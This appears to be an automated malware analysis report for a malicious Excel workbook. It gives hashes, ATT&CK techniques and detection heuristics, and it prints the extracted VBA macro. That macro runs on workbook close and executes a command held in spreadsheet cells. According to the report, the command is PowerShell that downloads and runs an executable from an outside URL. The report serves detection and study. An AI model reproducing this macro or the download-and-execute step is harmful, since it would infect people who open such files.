Xls.Malware.Sagent-10035294-0 Office (OOXML) malware analysis — malicious · 42f4b898bfe7d71c

MALICIOUS

Office (OOXML)

81.3 KB First seen: 2021-10-01

MD5: 0c678ccad4ab0c7fd3fd9f1a29082d0e SHA-1: b1c7413f1fcc55c3e16bb3f578543dbdd817d428 SHA-256: 42f4b898bfe7d71c0c75e9dfe68426e765a044f7dfb01763e7196eb609126dd6

222 Risk Score

Malware Insights

Xls.Malware.Sagent-10035294-0 · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File

The sample contains VBA macros that leverage the CreateObject function to execute a PowerShell command. This command downloads a second-stage executable from 'https://kobemas.com/data.exe' and saves it as 'C:\Users\Public\aqddkddzv.exe', then executes it. This indicates a downloader or droppper functionality.

Heuristics 5

ClamAV: Xls.Malware.Sagent-10035294-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Xls.Malware.Sagent-10035294-0
LOLBin token sequence in document text high SE_LOLBIN_RUN_COMMAND

Extracted document text contains a Windows script/execution tool name (PowerShell, mshta, cmd, rundll32, regsvr32, …) within 220 characters of a dangerous flag, command verb, or URL. This is a visible 'run this' instruction in HTML/PDF/RTF lure bodies, or — in macro-laden Office files — the macro's own string-pool entries appearing adjacent in extracted text.
VBA project inside OOXML medium 1 related finding OOXML_VBA

Document contains a VBA project — VBA macros present
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL https://kobemas.com/data.exe In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	1310 bytes
SHA-256: `db5ca08ecec626ddccac285b9daf08eb004e2350d72559067ee3c727769a24da`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisWorkbook" Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Private Sub Workbook_BeforeClose(Cancel As Boolean) Range("A1:J15").Select Selection.Font.Bold = True Selection.Font.Italic = True Selection.Font.Underline = xlUnderlineStyleSingle wjvaxudypngmffyzsdymsxbeh = Range("A3").Value With Selection .HorizontalAlignment = xlCenter .VerticalAlignment = xlBottom .WrapText = False .Orientation = 0 .AddIndent = False .IndentLevel = 0 .ShrinkToFit = False .ReadingOrder = xlContext .MergeCells = False End With Range("M5").Select Set sybkmjmmjkpieiwgynbsjmaep = CreateObject(Range("A4").Value) Dim xenogzdefqjwcpyvsfcpjnrbe xenogzdefqjwcpyvsfcpjnrbe = sybkmjmmjkpieiwgynbsjmaep.Create(wjvaxudypngmffyzsdymsxbeh) End Sub Attribute VB_Name = "lheqogmaowrmjntrwsgkyarpl" Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = True
`vbaProject_00.bin`	vba-project	OOXML VBA project: xl/vbaProject.bin	5120 bytes
SHA-256: `627299891099d0782030b015431ac0a39e38d8482e2665306a842f0e69655f7a`
Detection ClamAV: Xls.Malware.Sagent-10035294-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.